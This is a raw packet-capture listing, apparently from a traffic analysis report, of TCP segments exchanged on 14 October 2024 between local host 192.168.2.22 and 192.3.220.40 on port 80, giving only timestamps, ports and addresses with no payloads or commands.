                                                                                                                                                                              Oct 14, 2024 11:06:25.709151030 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.709157944 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709192038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709203005 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709233999 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.709275961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709286928 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709299088 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709311008 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709321022 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.709367037 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.709397078 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709408045 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709419966 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709431887 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709444046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709450006 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.709458113 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709467888 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.709479094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709491014 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709497929 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709507942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.709528923 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.709528923 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.712872982 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.712897062 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.712955952 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713388920 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713401079 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713412046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713453054 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713459015 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713465929 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713479042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713490963 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713526964 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713536024 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713536024 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713537931 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713551998 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713563919 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713576078 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713587999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713599920 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713601112 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713601112 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713622093 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713638067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713649988 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713660955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713673115 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713684082 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713695049 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713695049 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713758945 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713812113 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713869095 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713881016 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713932991 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.713941097 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713953018 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713963985 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713982105 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.713993073 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714003086 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714003086 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714037895 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714229107 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714241982 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714252949 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714279890 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714297056 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714308977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714319944 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714332104 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714344025 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714370966 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714422941 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714436054 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714447021 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714457989 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714469910 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714478016 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714478016 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714481115 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714502096 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714509010 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714520931 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714530945 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714541912 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714554071 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714564085 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714566946 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714566946 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714576006 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714585066 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.714612961 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.714612961 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.802978039 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803005934 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803016901 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803040981 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803051949 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803052902 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803064108 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803080082 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803091049 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803091049 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803096056 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803112030 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803122997 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803139925 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803143024 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803143024 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803153038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803164959 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803180933 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803229094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803240061 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803251982 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803251982 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803266048 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803277016 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803278923 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803292990 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803297997 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803407907 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803440094 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803463936 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803483963 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803495884 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803507090 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803519011 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803519011 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803538084 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803539038 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803550959 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803563118 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803574085 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803585052 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803589106 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803590059 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803596973 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803606987 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803618908 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803631067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803642035 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803643942 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803653955 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803675890 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803678989 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803680897 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803687096 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803689003 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803689003 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803699017 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803709984 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803719997 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803731918 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803736925 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803736925 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803744078 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803755999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803757906 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803767920 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803780079 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803782940 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803802013 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803811073 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803822994 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803838968 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803850889 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803862095 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803878069 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803878069 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803904057 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803914070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803925037 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803936005 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803952932 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803957939 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803957939 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803972960 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803983927 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.803993940 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.803996086 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.804008007 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.804008961 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.804023027 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.804039001 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.804138899 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.807985067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.807998896 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808010101 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808022022 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808034897 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808051109 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808063030 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808063030 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808070898 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808079004 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808083057 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808094978 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808106899 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808116913 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808130026 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808150053 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808152914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808152914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808161974 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808171988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808248043 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808260918 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808278084 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808289051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808291912 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808306932 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808319092 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808331013 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808339119 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808377028 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808794022 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808816910 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808826923 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808881044 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808892012 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808903933 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808917046 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.808924913 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.808924913 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809003115 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809015036 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809026957 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809041023 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809048891 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809048891 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809052944 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809066057 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809077978 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809089899 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809102058 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809108973 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809108973 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809135914 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809139967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809158087 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809169054 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809179068 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809195042 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809202909 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809202909 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809216022 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809226990 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809237957 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809251070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809261084 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809262037 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809262037 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809276104 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809289932 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.809315920 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.809315920 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897136927 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897152901 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897166014 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897183895 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897193909 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897212982 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897227049 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897228003 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897244930 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897274017 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897288084 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897299051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897310019 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897322893 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897342920 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897344112 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897452116 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897463083 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897474051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897485971 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897495985 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897496939 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897510052 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:25.897514105 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                              Oct 14, 2024 11:06:25.897521019 CEST8049177192.3.220.40192.168.2.22
